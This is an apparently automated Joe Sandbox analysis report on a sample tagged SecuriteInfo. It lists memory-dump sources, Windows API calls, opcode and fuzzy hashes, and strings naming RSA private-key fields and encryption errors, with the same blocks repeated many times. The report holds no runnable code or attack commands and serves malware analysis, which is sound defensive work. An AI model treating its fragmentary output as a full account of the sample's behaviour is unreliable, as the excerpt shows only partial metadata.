                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
                                            • String ID:
                                            • API String ID: 1303881157-0
                                            • Opcode ID: 22c6c2f68c77dfcfaeb204ff7ba67d23c6241122159464e31bcd1ade8d5db43e
                                            • Instruction ID: eb35ee4bc877b7ae3c31eba0aa20e8996c0037d5b97ff5b9ba7107310129363e
                                            • Opcode Fuzzy Hash: 22c6c2f68c77dfcfaeb204ff7ba67d23c6241122159464e31bcd1ade8d5db43e
                                            • Instruction Fuzzy Hash: 8351D3B5A04301AFDB008F35C885B9A7BB4AB89368F3586A9FC14CF7C5D774D8058BA5
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 2168136238-4289949731
                                            • Opcode ID: 7244f3edf980daabe1d27993a41b63f21be264c2b4911571d92f09ad42955135
                                            • Instruction ID: 405cd40e67713cd114900ed3fb31e34ed9112a5e2a866d1110e47feb42ad92ba
                                            • Opcode Fuzzy Hash: 7244f3edf980daabe1d27993a41b63f21be264c2b4911571d92f09ad42955135
                                            • Instruction Fuzzy Hash: C74142323056108BE7249E5C9A80E7EB3F9DBA6714B710A1FF0B187F50D7619C458763
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RSDi
                                            • API String ID: 4225690600-559181253
                                            • Opcode ID: 60ffb48540661dde96fb2d8ea5f92d13aa58d6aa58385b16feabba6237411fd2
                                            • Instruction ID: 250c1938f2c8097ee40dd13e586540c6ee3f950b07a17ca1cde3d2faab9ef346
                                            • Opcode Fuzzy Hash: 60ffb48540661dde96fb2d8ea5f92d13aa58d6aa58385b16feabba6237411fd2
                                            • Instruction Fuzzy Hash: 47414EB4A016049FCB00DFA9CA84A6EB7F9AF89308F308599E519EB755DB31ED41CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RSUa
                                            • API String ID: 4225690600-2086061799
                                            • Opcode ID: 1dedc86250a47239049d0da5eb7f2d9ea96b2b3b9515ed5713818baec625c288
                                            • Instruction ID: 4f8d4dcb4b42da1a88b135f62f3400868419a01d3c2c2dd95219900ff9f5c512
                                            • Opcode Fuzzy Hash: 1dedc86250a47239049d0da5eb7f2d9ea96b2b3b9515ed5713818baec625c288
                                            • Instruction Fuzzy Hash: 1D311DB0A016089FDB00CB69C984B6DB7B9AF99308F30859AE514E7751C775E941CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RSqb
                                            • API String ID: 4225690600-347567867
                                            • Opcode ID: 3dd75c302036c626ed5bc977f063b7711639fb1b3a9a8193ada8ac246d441529
                                            • Instruction ID: 54f7748ac9b257adb5b3d7fb36a1175007d2c80372297e63c098adca4e6789c3
                                            • Opcode Fuzzy Hash: 3dd75c302036c626ed5bc977f063b7711639fb1b3a9a8193ada8ac246d441529
                                            • Instruction Fuzzy Hash: 56314DB0A016189FCB00DFA9CE84B6DF7B9AF99308F30859AE514E7741D775E9418F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RSa
                                            • API String ID: 4225690600-3169278968
                                            • Opcode ID: b717b4ac98d7b7d90c6724fe260f24b8dd5280ddabf0ff320f33316e33c512cb
                                            • Instruction ID: cccd4a83a87bcd3d34dd66db500fbd458103dc97cb3163e357252c5904eaea4e
                                            • Opcode Fuzzy Hash: b717b4ac98d7b7d90c6724fe260f24b8dd5280ddabf0ff320f33316e33c512cb
                                            • Instruction Fuzzy Hash: A3314BB0A016189FCB00DFA9CE84B6EF7B9AF99308F30859AE418E7741C775E9418F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RS:h
                                            • API String ID: 4225690600-3891202347
                                            • Opcode ID: 0d250f79539a7817b6e3af1f9794423373cd1cfbcca04f429bbf4c4630b6dec3
                                            • Instruction ID: d29c2ab90bf66f6f25a613f7e7d6f6fcd0e5b607d0cd4834d7a16ac4a0740c4f
                                            • Opcode Fuzzy Hash: 0d250f79539a7817b6e3af1f9794423373cd1cfbcca04f429bbf4c4630b6dec3
                                            • Instruction Fuzzy Hash: C0314BB0E016089FDB04CFA9CD84B6EB7B9AF99208F30859AE458E7751C775ED818F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RS3g
                                            • API String ID: 4225690600-2794631155
                                            • Opcode ID: 2b82e12a8e16e28b7374e29514d761b911c8263329d9792503978767ac36c267
                                            • Instruction ID: 11009bd50ef91f3bf0dbf48d2cdf956793e1413f91abf139edfcc10e18727c70
                                            • Opcode Fuzzy Hash: 2b82e12a8e16e28b7374e29514d761b911c8263329d9792503978767ac36c267
                                            • Instruction Fuzzy Hash: 60314DB0A016089FCB00CFA9CE84B6DB7B9AF99208F30869AE458E7751C771E945CF50
                                            APIs
                                            • type_info::operator!=.LIBCMT ref: 6CEEC7EB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: type_info::operator!=
                                            • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
                                            • API String ID: 2241493438-339133643
                                            • Opcode ID: 37fc1f3fe356c7adfd8fcb57307fbd9cec29c188d810c9f4b44696cda916ff78
                                            • Instruction ID: 62203f3be3aa03ea45b6f96eba4bcd66c76da4dd29e99ce1b5101b32a2a637bf
                                            • Opcode Fuzzy Hash: 37fc1f3fe356c7adfd8fcb57307fbd9cec29c188d810c9f4b44696cda916ff78
                                            • Instruction Fuzzy Hash: 73318071A183408EC710DF7DC84659ABBF1AFC9248F214A2EF4449BB60EB71D848CB82
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID: RS%e
                                            • API String ID: 4225690600-1409579784
                                            • Opcode ID: 2f36d265bae95e9729f11afc9ad694381574ff39b579cfd0c070e2866c18c561
                                            • Instruction ID: b52489e47c0d63b6e60f1b3bf5b4e7a72ffe8c49532ce967f8004142d2bfe400
                                            • Opcode Fuzzy Hash: 2f36d265bae95e9729f11afc9ad694381574ff39b579cfd0c070e2866c18c561
                                            • Instruction Fuzzy Hash: 6D316BB0A016189FCB10CBA9CD84BADF7B9AF95308F30859AE558E7741C775D9418F50
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit
                                            • String ID:
                                            • API String ID: 2610073882-0
                                            • Opcode ID: 4322715a52d01a4c6370c58f2123f77499d84f3d426663e8a0192dfd009fe25b
                                            • Instruction ID: 53a07fbf01a5391c6faa0dfb2e6c634bfbe9096990014107622413cf7d306c90
                                            • Opcode Fuzzy Hash: 4322715a52d01a4c6370c58f2123f77499d84f3d426663e8a0192dfd009fe25b
                                            • Instruction Fuzzy Hash: 24C147716087009FD310DFA8C88095AB7F6BFC8708F248A4DE5989B761D771E846CFA2
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEA9DEB
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEA9DFB
                                            • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEA9E29
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEA9F25
                                            • VariantClear.OLEAUT32(?), ref: 6CEA9FE5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                            • String ID: @
                                            • API String ID: 3214203402-2766056989
                                            • Opcode ID: bb5cc8fb5b123e33c2cd0ee573f0e8505ccc1a0b2982913f13b7ace03aeffbc1
                                            • Instruction ID: b3159edb68d1786026e3099da02f6b65c4877d39a7e4cdcc8f17e73383d2b20e
                                            • Opcode Fuzzy Hash: bb5cc8fb5b123e33c2cd0ee573f0e8505ccc1a0b2982913f13b7ace03aeffbc1
                                            • Instruction Fuzzy Hash: E0D16A71E012498FDB00DFE8C880AADBBB5BF88308F34815DE515AB755D735AA46CF90
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEAB3EB
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEAB3FB
                                            • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEAB429
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEAB525
                                            • VariantClear.OLEAUT32(?), ref: 6CEAB5E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                            • String ID: @
                                            • API String ID: 3214203402-2766056989
                                            • Opcode ID: af5f0546b9f327255cd747e8063c2d9b6e1e65c2154e2ec087a63f3166c21686
                                            • Instruction ID: 0cddbaadb9e16c9a99234678836b6d18ea0956d7eaffcac87169c100203237b3
                                            • Opcode Fuzzy Hash: af5f0546b9f327255cd747e8063c2d9b6e1e65c2154e2ec087a63f3166c21686
                                            • Instruction Fuzzy Hash: C1D15871E0124D8FDB00DFE8C880AADBBB6BF88308F24815DE515AB755D770AA46CF90
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 6CED16B2
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            • __CxxThrowException@8.LIBCMT ref: 6CED180A
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            Strings
                                            • : this key is too short to encrypt any messages, xrefs: 6CED162A
                                            • exceeds the maximum of , xrefs: 6CED173F
                                            • : message length of , xrefs: 6CED170D
                                            • for this public key, xrefs: 6CED1771
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
